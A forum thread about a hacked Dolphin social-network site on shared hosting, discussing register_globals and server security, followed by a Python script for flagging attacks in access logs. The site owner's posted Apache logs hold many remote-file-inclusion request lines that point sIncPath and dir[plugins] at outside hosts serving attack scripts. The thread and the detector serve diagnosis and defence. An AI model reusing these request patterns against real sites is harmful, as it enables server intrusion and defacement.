rednerus
Site Hacked
Comments
sammie | 116 days ago

get a dedicated server or host with someone that has a dedicated server, there are a few of us that have a dedicated server and offer hosting, as we set up our servers for our dolphin sites, you can be assured that unlike shared hosting, we protect our own servers from hackers as much as we can. shared hosts set up their servers to accommodate for the masses, and leave huge security holes in them.

lrepton | 116 days ago

Yup....this morning it is down again at ixwebhosting.com! Webserver probs!!!!!!! Even tho we have "dedicated" servers for our domain there, the database is on a "shared" server. So far, I have not been hacked. (Crossed fingers) But I added the php.ini file suggested by many to alter the register globals that ixwebhosting has ON. (Should be OFF for security)

DosDawg | 116 days ago

as noted on the blogs from boonex, there have been two releases that address security problems. but i take the stand sammie has: first of all, read the server requirements that boonex recommends. when you go against what the developer says, then you have to expect to have unpredictable outcomes.

now beyond that, if you are on a server where register_globals are ON, then you are defying gravity itself. as stated by php.net, register_globals should be off, and developers should try to write their software so that register_globals are not required to be on. now when you go to a host where by default they have turned on register_globals, you have to see the red flags standing up in the air on that one.

what happens is that it doesn't necessarily have to be the dolphin suite that gets hacked, but the server itself; that is the vulnerability moreso than the script. once the server is compromised, the culprits will use whatever avenue they can to access sites and deface them. it's a game to them, so one jamokey buys himself a $1.99 hosting account and all his little cronies then try their attacks. once they have a script that has the RFI exploit exposed, then they start posting this information. it's not that any one individual pays the money, look at the sparce wan that was hit, most all kids who have a website, be it php or joomla or whatever, they are most likely on a shared server, then they have their clan, and as soon as they find a script with a hole, and it's posted on the internet that there is a hole in the script, not otherwise accessible but for the script being hosted on a shared server. now what happens is that they load up a remote shell script (php) and they all get busy looking around in the server.

why is it they don't get caught you say, well granted it is a shared server account, nobody really cares if the data gets lost or not from the hosting company, just as 100 $1.99 accounts leave, 100 $1.99 accounts come in the next day.

this server is not monitored, and you are just fair game when you are on a shared hosting environment. so yes, you can apply what patches you can find, you can upload the latest release, but to me this is only running on a wing and a prayer. you need to get to a minimum VPS and better than that is a Dedicated server. well i am done rambling.

later, DosDawg

sammie | 115 days ago

you can not be on a dedicated server, you have your own box and your own database is on that box, so you must be on shared hosting, if you have to use a database other than localhost. godaddy have the same setup with their shared hosting, they have you use a database on another server.

sammie | 115 days ago

this is a chat i had with your host: i believe you are mixing a dedicated ip with a dedicated server, they do not have any VPS or dedicated servers on offer for hosting.

Chat Information: Please wait for a site operator to respond.
Chat Information: You are now chatting with 'Alex Golovko'
Alex Golovko: Hello, my name is Alex, please let me know how can I help you today?
you: hi, i was looking at your site and i do not see any dedicated servers or VPS
you: do you not offer either?
you: or are you just a shared hosting plan?
Alex Golovko: We're not providing dedicated or VSP servers sorry, all servers shared
you: ok thank you ever so much for your help, have a nice day

this comment is the killer: "We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!" hackers can run any application they like, love it

gameutopia | 115 days ago

If they have register globals on with all their servers that seems odd. Maybe they are using an older version of php which could potentially be the cause of other vulnerabilities. But that wouldn't make sense that they wouldn't just turn it off. Or possibly something with their setup, in particular the software they run is an older script that requires register globals on. I don't know hsphere that well, last time I checked that's what they were running. Or maybe their billing/automation script requires this. It does seem kind of odd that a fairly large host like ixwebhosting hasn't had other problems related to register globals on and made some adjustments.

rednerus | 115 days ago

Thanks sammie, DosDawg, gameutopia for your inputs. I would certainly go for a dedicated server once the site becomes a bit busy. I would at least go for a VPS for now but I am still not convinced that I would be safe either. I have chosen IX after knowing that it was one of the best sites and I host several of my other websites over there now. I think I will have to change the host now. I looked at the log files and found these:

```
189.112.40.11 - - [24/Jul/2008:21:36:06 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem1/jovemNOR.txt? HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
216.206.238.35 - - [24/Jul/2008:21:50:23 -0500] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 98 "-" "libwww-perl/5.803"
148.223.69.2 - - [24/Jul/2008:21:53:28 -0500] "GET //?sIncPath=http://hibbard22.net/id.txt? HTTP/1.1" 200 98 "-" "libwww-perl/5.805"
189.112.40.11 - - [24/Jul/2008:22:12:43 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem2/id.txt? HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
98.129.33.59 - - [24/Jul/2008:22:27:29 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
67.205.76.81 - - [24/Jul/2008:22:27:07 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 302 5 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 15239 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:56 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:28:43 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
216.246.91.250 - - [24/Jul/2008:22:28:44 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
216.246.91.250 - - [24/Jul/2008:22:28:04 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:40 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:48 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:40:30 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
82.128.9.68 - - [25/Jul/2008:04:59:49 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=back HTTP/1.1" 200 131 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
82.128.9.68 - - [25/Jul/2008:04:59:50 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=home HTTP/1.1" 200 221 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
```

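One way to triage an access log like the one posted above, as an added example that is not part of the original thread: it flags every request whose query parameter carries a remote URL, the pattern seen in the `sIncPath` and `dir[plugins]` requests, and groups the hits by parameter name. The sample lines are constructed (documentation IP ranges and example domains), and `rfi_attempts` and `summarize` are names chosen here.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache combined log format: client, identd, user, [time], "request line", status, ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A parameter value that starts with a URL scheme; group 1 is the remote host[:port].
REMOTE_RE = re.compile(r"\s*(?:https?|ftps?)://([^/?#\s]+)", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, example domains), not taken from the thread.
SAMPLE = [
    '192.0.2.10 - - [24/Jul/2008:21:36:06 -0500] "GET //?sIncPath=http://files.example.net/id.txt? HTTP/1.1" 200 98 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://drop.example.org/a.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"',
    '198.51.100.7 - - [24/Jul/2008:22:27:05 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2Fdrop.example.org%2Fa.txt%3F&act=img HTTP/1.1" 200 131 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Jul/2008:22:28:11 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://drop.example.org/a.txt?? HTTP/1.1" 302 5 "-" "libwww-perl/5.810"',
    '203.0.113.9 - - [24/Jul/2008:22:29:40 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def rfi_attempts(lines):
    """Yield (ip, status, path, param, remote_host) per query parameter holding a remote URL."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Split by hand: urlsplit() would treat a target starting with "//" as a host name.
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so dir%5Bplugins%5D and dir[plugins] group together.
        for param, value in parse_qsl(query, keep_blank_values=True):
            hit = REMOTE_RE.match(value)
            if hit:
                yield m["ip"], int(m["status"]), path, param, hit.group(1).lower()

def summarize(lines):
    """Per parameter name: request count, how many returned 200, client IPs, remote hosts."""
    report = defaultdict(lambda: {"requests": 0, "served_200": 0, "clients": set(), "hosts": set()})
    for ip, status, _path, param, host in rfi_attempts(lines):
        entry = report[param]
        entry["requests"] += 1
        entry["served_200"] += int(status == 200)
        entry["clients"].add(ip)
        entry["hosts"].add(host)
    return dict(report)

if __name__ == "__main__":
    for param, entry in sorted(summarize(SAMPLE).items()):
        print(param, entry["requests"], entry["served_200"], sorted(entry["clients"]), sorted(entry["hosts"]))
```

A 200 status only shows that the server answered the request; whether the remote file was actually included depends on the script and the PHP settings, so matching lines are leads for review rather than proof of compromise.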